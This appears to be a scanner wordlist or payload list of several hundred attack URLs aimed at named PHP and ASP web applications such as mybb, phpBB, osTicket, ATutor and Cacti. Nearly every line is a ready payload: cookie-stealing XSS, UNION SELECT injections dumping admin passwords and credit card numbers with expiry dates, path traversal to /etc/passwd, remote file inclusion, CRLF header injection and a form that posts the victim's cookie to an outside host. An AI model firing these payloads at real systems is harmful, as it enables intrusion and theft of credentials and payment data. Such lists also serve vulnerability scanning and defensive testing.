/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] 
/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] 
/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS] 
/simple-upload-53.php?message=[XSS] 
/index.php?act=load&dir=[XSS] 
/products/calendar/demo/admin/?Admin_ID=Admin' UNION ALL SELECT
/index.php?act=delete&dir=&file=[XSS]
/index.php?act=copy&dir=&file=[XSS]
/index.php?act=rename&dir=&file=[XSS] 
/auction_rating.php?mode=view&u=' 
/auction_offer.php?mode=add&ar=' 
/path_to_store/index.php?modID=usrauthlogin&sgnuptype=csaleID&username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&errorMsgNum=301 
/path_to_store/cart.php?chckoutaction=1&ckprvd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/path_to_store/adminshop/index.php?hdoc=index%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/path_to_store/adminshop/index.php?modID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/path_to-store/adminshop/index.php?taskID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/path_to_store/adminshop/index.php?proMod=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/path_to_store/adminshop/mmailer/index.php?mmactionComm=mmShowMailingLists%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/thread.php?threadid=[Topic_ID]&hilight=[XSS] 
/phpBB2/profile.php?mode=viewprofile&u=\[]\ 
/phpBB2/viewtopic.php?p=3&highlight=\[]\ 
/pms.php?folderid=[XSS] 
/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http
/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http
/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http
/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http
/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http
/src/index_overview.inc.php?config[path_src_include]=http
/src/index_leftnavbar.inc.php?config[path_src_include]=http
/src/index_image.inc.php?config[path_src_include]=http
/src/image-gd.class.php?config[path_src_include]=http
/src/image.class.php?config[path_src_include]=http
/src/album.class.php?config[path_src_include]=http
/src/show_random.inc.php?config[path_src_include]=http
/src/main.inc.php?config[path_src_include]=http
/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http
/admin_modules/admin_module_info.inc.php?lang_akt[admin_ainfo_hmain]=[XSS]
/src/index_footer-copyright.inc.php?config[release]=[XSS]
/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS] 
/forum/index.php?act=PostCODE=02f=4t=3qpid='[SQL] 
/CMS/gcms/code/error.php?path_prefix=http
/[blogpath]/?postid=1%20or%201=1 
/phpcart.php?action=add&id=1002&descr=Mobile%20Phone&price=0&postage=&quantity=100 
//claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
//claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
//claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
//claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
//claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- 
/index.php?p='[SQL code]
/index.php?area=1&p='[SQL code] 
/index.php?q='[SQL code] 
/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/* 
/closeup.php?image=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?currentIsExpanded=0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentNumber=8 
/index.php?function=search&searchFor=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/uk/list/c/software_CAD_Technical_60002_uk.htm?currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&currentIsExpanded=0 
/store/uk/product/">%0d%0aSet-Cookie
/login.php?w=user&o=login&phpcoinsessid=SQL_INJECTION'
/mod.php?mod=pages&mode=list&dtopic_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b
/mod.php?mod=pages&mode=list&dcat_id=SQL_INJECTION'&phpcoinsessid=fa7905a749dbdc698838930de0f99f4b 
/jgs_portal.php?id='SQL_here 
/basket.php?rp=products.php%3Fcategory_id%3D0[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3D[XSS-CODE]%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D
/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id[XSS-CODE]%26search_category_id%3D
/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D[XSS-CODE]%26search_category_id%3D
/basket.php?rp=products.php%3Fcategory_id%3D0%26search_string%3Dss%26search_string%3Dss%26search_category_id%3D%26search_category_id%3D[XSS-CODE]
/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/page.php?page=%3Cp%3Ean%20eror%20was%20send%20to%20webmaster,%20please%20insert%20your%20username%20and%20password%20,%20and%20continue%20shopping%20%3Cform%20action=%22http
/reviews.php?category_id=0&item_id=4[XSS-CODE]
/reviews.php?category_id=0[XSS-CODE]&item_id=4
/reviews.php?filter=0&item_id=4[XSS-CODE]&category_id=0
/product_details.php?item_id=4&category_id=0[XSS-CODE]
/products.php?category_id=13[XSS-CODE]
/products.php?category_id=0&search_string=[XSS-CODE]&search_category_id=
/news_view.php?news_id=3&rp=news.php[XSS-CODE]&page=1
/news_view.php?news_id=3&rp=news.php&page=1[XSS-CODE] 
/view.php?e=test@test.com&t=480826[XSS]
/include/header.php?osticket_title=%3C/title%3E[XSS]
/include/admin_login.php?em=asdf[XSS]
/include/user_login.php?e=asdf[XSS]
/include/open_submit.php?err=[XSS]
/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*
/admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201/*
/view.php?s=advanced&query=&cat=-99%20UNION%20SELECT%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5/*&status=&sort=ID&way=ASC&per=5&search_submit=Search
/include/main.php?config[search_disp]=true&include_dir=http
/attachments.php?file=../../../../../../.. /etc/passwd 
/users/main.php?p=5&do=2&v=177%22%3E[XSS]
/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
/admin/0.php?do=ratekb&id=11%22%3E[XSS]
/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]
/admin/5.php?do=rmattach&rm=yes&id=../index.php
/users/index.php?lang=en.inc/../../../../../../etc/passwd%00
/users/main.php?p=http
/index.php?act='><script>alert(document.cookie)</script> 
/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categor
/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</sc
/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script> 
/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku= 
/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=
/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=
/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script> 
/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION 
/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION 
/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert
/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%
/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63
/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%
/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment 
/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
/path/item_list.asp?maingroup=[SQL INJECTION] 
/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION] 
/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment 
/shop/search_list.php?chose=item&searchstring=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E 
/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E 
/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E 
/guestbook/index.php?entry='
/guestbook/index.php?entry=%27 
/codethat/catalog.php?action=category_show
/shoppingcart/catalog.php?action=category_show
/shoppingcart/demo/catalog.php?action=
/index.php?mod=news&ac=plus&month=[XSS INJECTION]&annee=[XSS INJECTION]
/index.php?mod=stats&aff=forum&nbractif=[XSS INJECTION]
/index.php?mod=stats&aff=pages&annee=[XSS INJECTION]
/profil.php?id=1%20[XSS INJECTION]
/memberlist.php?mb_lettre=%A4%20[XSS INJECTION]
/memberlist.php?mb1_order=id&mb1_ord=DESC&lettre=[XSS INJECTION]
/index.php?&mod=recherche&choix_recherche=2&chaine_search=[XSS INJECTION]&multi_mots=tous&choix_forum=1&auteur_search=[XSS INJECTION] 
/profil.php?id='[SQL Injection] 
/wowbb/view_user.php?list=1&letter=&sort_by='[SQL Injection] 
/security.php?codigo=
/request.php?../../e107_config.php 
/forum_viewforum.php?5.[INJECTION]# 
/?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/index.php?p=productsList&sWord=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/topic.php?topic=669%B4SQL%20INJECTION 
/forum/viewforum.php?id=t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
/forum/viewforum.php?id=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%7
/openbb/read.php?action=lastpost&TID='
/openbb/read.php?TID=' 
/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script> 
/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; 
/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=&lt;script&gt;var%20test=1;alert(test);&lt;/script&gt; 
/index.php?categoryID='[SQL inj] 
/index.php?mark=5&productID='[SQL inj]
/index.php?productID='[SQL inj] 
/index.php?module=Blocks&type=lang&func=../../../../../../etc/passwd%00 
/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors
/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u 
/jgs_portal_statistik.php?meinaction=mitglieder&month=1&year=1[SQL-Injection]
/jgs_portal_statistik.php?meinaction=themen&month=1&year=1[SQL-Injection]
/jgs_portal_statistik.php?meinaction=beitrag&month=1&year=1[SQL-Injection]
/jgs_portal.php?anzahl_beitraege=[SQL-Injection]
/jgs_portal_beitraggraf.php?month=1&year=1[SQL-Injection]
/jgs_portal_viewsgraf.php?jahr=1&monat=1&tag=1[SQL-Injection]
/jgs_portal_themengraf.php?month=1&year=1[SQL-Injection]
/jgs_portal_mitgraf.php?month=1&year=1[SQL-Injection]
/jgs_portal_sponsor.php?id=[SQL-Injection] 
/wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS] 
/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,
/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0,
/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0,
/support/lh/icon.php?status=-99' UNION SELECT
/support/lh/chat_download.php?fid=-99' UNION
/index.php?include_location=http
/topo/index.php?m=top"><SCRIPT>alert()</script>&s=info&ID=1114815037.2498
/topo/index.php?m=top&s=info&ID=1115946293.3552"><SCRIPT>alert()</SCRIPT>&t=puntuar
/topo/index.php?m=top&s=info"><script>alert()</script>&ID=1115946293.3552&t=puntuar
/topo/index.php?m=top"><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar
/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"><SCRIPT>alert()</script>
/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"><SCRIPT>alert()</script>
/topo/index.php?m=members&s=html&t=edit"><SCRIPT>alert()</script> 
/poll_vote.php?relativer_pfad=http
/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true
/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true
/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true
/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>
/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels
/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT> 
/index.php?gadget=Glossary&action=ViewTerm&term=<script
/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>
/npds/powerpack_f.php?language=<script>alert()</script>
/npds/sdv_infos.php?sitename=<script>alert()</script>
/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>
/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E
/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton
/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20user
/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s
/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>
/home.php?cat='><script>alert(document.cookie)</script>
/home.php?printable='><script>alert(document.cookie)</script>
/product.php?productid='><script>alert(document.cookie)</script>
/product.php?mode='><script>alert(document.cookie)</script>
/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
/help.php?section='><script>alert(document.cookie)</script>
/orders.php?mode='><script>alert(document.cookie)</script>
/register.php?mode='><script>alert(document.cookie)</script>
/search.php?mode='><script>alert(document.cookie)</script>
/giftcert.php?gcid='><script>alert(document.cookie)</script>
/giftcert.php?gcindex='><script>alert(document.cookie)</script> 
/home.php?cat='[SQL-inj]
/home.php?printable='[SQL-inj]
/product.php?productid='[SQL-inj]
/product.php?mode='[SQL-inj]
/error_message.php?access_denied&id='[SQL-inj]
/help.php?section='[SQL-inj]
/orders.php?mode='[SQL-inj]
/register.php?mode='[SQL-inj]
/search.php?mode='[SQL-inj]
/giftcert.php?gcid='[SQL-inj]
/giftcert.php?gcindex='[SQL-inj]
/download/downloads.php?release_id=650&incdir=http
/cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*
/cal_pophols.php?id=999'[sql]/*
/calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1
/cal_week.php?op=week&catview= 999'[sql]/*
/cal_cat.php?op=cats&catview=999'[sql]*/ 
/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*
/mybb/online.php?pidsql=)[sql_query]
/mybb/memberlist.php?usersearch=%'[sql_query]
/mybb/editpost.php?pid='[sql_query]
/mybb/forumdisplay.php?fid='[sql_query]
/mybb/newreply.php?tid='[sql_query]
/mybb/search.php?action=results&sid='[sql_query]
/mybb/showthread.php?tid='[sql_query]
/mybb/showthread.php?pid='[sql_query]
/mybb/usercp2.php?tid='[sql_query]
/mybb/printthread.php?tid='[sql_query]
/mybb/reputation.php?pid='[sql_query]
/mybb/portal.php?action=do_login&username='[sql_query]
/mybb/polls.php?action=newpoll&tid='[sql_query]
/mybb/ratethread.php?tid='[sql_query]
/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http
/\admin\/login.html
//admin//login.html 
/popper/childwindow.inc.php?form=http
/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 
/upload.php?step=rmdir&dir=../folder
/upload.php?step=mkdir&dir=../folder 
/flatnuke/index.php?mod=none_Search&find=1&where=null
/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/cerberus/index.php?errorcode=[Xss]&errorvalue=4&sid=[sessionid] 
/index.php?act=module&module=gallery&cmd=editcomment&comment=
/index.php?automodule=blog&blogid=1&cmd=editentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/*
/index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/*
/index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_members%20WHERE%201/*
/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2' 
/ovidentia/index.php?babInstallPath=http
/index.php?gallery=%3Cimg%20onmouseover=%22alert('hi')%22%20style=%22position
/index.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/pafiledb.php?action=viewall&start=20&sortby=name%22
/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
/pafiledb.php?action=category&id=1&pages=%22%3E
/pafiledb.php?action=admin&login=do&formname=-99'%20UNION
/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
/pafiledb.php?action=../../../../etc/passwd%00&login=do 
/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E
/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
/ATutor/contact.php?subject=[XSS-CODE]
/atutor/content.php?cid=323[XSS-CODE]
/atutor/inbox/send_message.php?l=1[XSS-CODE]
/atutor/search.php?search=10[XSS-CODE]&words=kk&include=all&find_in=this&display_as=pages&search=Search
/ATutor/search.php?search=1&words=aa[XSS-CODE]&include=one&find_in=all&display_as=summaries&search=Search#search_results
/ATutor/search.php?search=1&words=aa&include=one[XSS-CODE]&find_in=all&display_as=summaries&search=Search#search_results
/ATutor/search.php?search=1&words=aa&include=one&find_in=all[XSS-CODE]&display_as=summaries&search=Search#search_results
/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=[XSS-CODE]summaries&search=Search#search_results
/ATutor/search.php?search=1&words=aa&include=one&find_in=all&display_as=summaries&search=[XSS-CODE]Search#search_results
/ATutor/inbox/index.php?view=1[XSS-CODE]
/ATutor/tile.php?query=yy&field=technicalFormat&submit=Search[XSS-CODE]
/ATutor/tile.php?query=[XSS-CODE]&field=technicalFormat&submit=Search
/ATutor/tile.php?query=yy&field=technicalFormat[XSS-CODE]&submit=Search
/ATutor/forum/subscribe_forum.php?fid=2&us=1[XSS-CODE]
/ATutor/directory.php?roles%5B%5D=[XSS-CODE]1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
/ATutor/directory.php?roles%5B%5D=1&status=2&reset_filter=Reset+Filter[XSS-CODE]
/ATutor/directory.php?roles[]=1[XSS-CODE] 
/upb/ -u Alby\n";
/index.php?action=buy_now&products_id=22%0d%0atest
/index.php?action=cust_order&pid=2%0d%0atest
/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E 
/pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar 
/include/config_settings.php?config[include_path]=http
/path_of_cacti/include/top_graph_header.php?config[library_path]=http
/DUamazon/type.asp?iType=1[SQL inject] 
/DUamazonPro/admin/productDelete.asp?iPro=37&iCat=12[SQL Inject]
/DUamazonPro/admin/productEdit.asp?iPro=34&iCat=12[SQL Inject]
/whoiscart/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fwww.example.com%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E 
/ubbt/download.php?Number=42227[SQL] 
/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]
/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005 
/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post 
/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received 
/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat 
/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded 
/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL] 
/mensajeitor.php?nick=megabyte&url=http
/mensajeitor.php?nick=megabyte&url=http
/read.php?1,[MALICIOUS_SQL_CODE],newer 
/osticket/view.php?inc=x 
/cacti/graph_image.php?local_graph_id=[valid_value]&gr
/calendar/calendar.php?serverPath=http
/calendar/functions/popup.php?serverPath=http
/calendar/events/header.inc.php?serverPath=http
/calendar/events/datePicker.php?serverPath=http
/calendar/setup/setupSQL.php?serverPath=http
/index.php?cid=[SQL Command] 
/index.php?cid=<script>alert(document.cookie)</script> 
/delete.php?comment=1&id=[ID of comment here]
/delete.php?news=1&id=[ID of news here]
/delete.php?shout=1&id=[ID of shout here] 
/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.example.com%27%3B%3C%2Fscript%3E&dir=&searchMode= 
/gb/form.inc.php3?lang=http
/[path]/gadgets/Blog/BlogModel.php?path=
/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search 
/cartwiz/store/tellAFriend.asp?idProduct='
/cartwiz/store/viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0
/cartwiz/store/updateCreditCards.asp?id='
/cartwiz/store/deleteCreditCards.asp?id=' 
/[path_to_photogal]/ops/gals.php?news_file=http
/index.php?site=warn&f=1%20WHERE%200=1%20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%20WHERE%20mem_id=1/*&0&warn=0 
/SPiD/lang/lang.php?lang_path=http
/inc/functions.inc.php?config[ppa_root_path]=http
/calendar.php?mth=3&yr=2006"><script src=
/dev/injection/js.js"></script> 
/catalog/extras/update.php?readme_file=/etc/passwd
/catalog/extras/update.php?readme_file=../admin/.htaccess 
//www.s=''style='font-size
/tforum/member.php?Action=viewprofile&username=<script>JavaScript
//[www.example.com]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script> 
/header.php?version=</title><script>alert(document.cookie)</script>
/footer.php?version=<script>alert(document.cookie)</script> 
/apa_phpinclude.inc.php?apa_module_basedir=http
/[path]/submit.php?portnum="/><script>alert(document.cookie)</script>
/[path]/nqgeoip2.php?step=<script>alert(document.cookie)</script>
/[path]/nqgeoip2.php?body=<script>alert(document.cookie)</script>
